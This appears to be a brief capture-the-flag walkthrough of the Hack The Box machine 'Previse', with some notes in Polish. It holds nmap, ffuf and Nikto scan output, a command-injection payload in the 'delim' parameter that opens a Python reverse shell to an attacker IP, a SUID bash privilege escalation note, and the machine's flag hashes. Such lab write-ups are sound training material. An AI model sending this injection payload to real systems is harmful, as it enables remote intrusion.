Previse - 16.08.2021
NMap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
ffuf
Starting ffuf scan [15/139]
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.11.104:80/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.hta [Status: 403, Size: 277, Words: 20, Lines: 10]
.hta.php [Status: 403, Size: 277, Words: 20, Lines: 10]
.htaccess [Status: 403, Size: 277, Words: 20, Lines: 10]
accounts.php [Status: 302, Size: 3994, Words: 1096, Lines: 94]
.htaccess.php [Status: 403, Size: 277, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10]
.htpasswd.php [Status: 403, Size: 277, Words: 20, Lines: 10]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 302, Size: 2801, Words: 737, Lines: 72]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1]
css [Status: 301, Size: 310, Words: 20, Lines: 10]
download.php [Status: 302, Size: 0, Words: 1, Lines: 1]
favicon.ico [Status: 200, Size: 15406, Words: 15, Lines: 10]
files.php [Status: 302, Size: 4914, Words: 1531, Lines: 113]
footer.php [Status: 200, Size: 217, Words: 10, Lines: 6]
header.php [Status: 200, Size: 980, Words: 183, Lines: 21]
index.php [Status: 302, Size: 2801, Words: 737, Lines: 72]
index.php [Status: 302, Size: 2801, Words: 737, Lines: 72]
js [Status: 301, Size: 309, Words: 20, Lines: 10]
login.php [Status: 200, Size: 2224, Words: 486, Lines: 54]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
logs.php [Status: 302, Size: 0, Words: 1, Lines: 1]
nav.php [Status: 200, Size: 1248, Words: 462, Lines: 32]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
status.php [Status: 302, Size: 2968, Words: 749, Lines: 75]
:: Progress: [9228/9228] :: Job [1/1] :: 299 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
Nikto
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.104
+ Target Hostname: 10.10.11.104
+ Target Port: 80
+ Start Time: 2021-08-16 00:00:24 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7889 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2021-08-16 00:09:36 (GMT2) (552 seconds)
Strona główna
BurpSuite
Redirection / przekierowanie
Accounts.php
Config.php
Parametr delim jest podany na Command Injection
delim=comma;python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.11",9001))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'
Privilages Escalation
SUID
/bin/bash
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
user.txt
b2882ebd87e192d549bd001610313ad3
root.txt
47c75b9d5e0ade166981d0b5823b47e1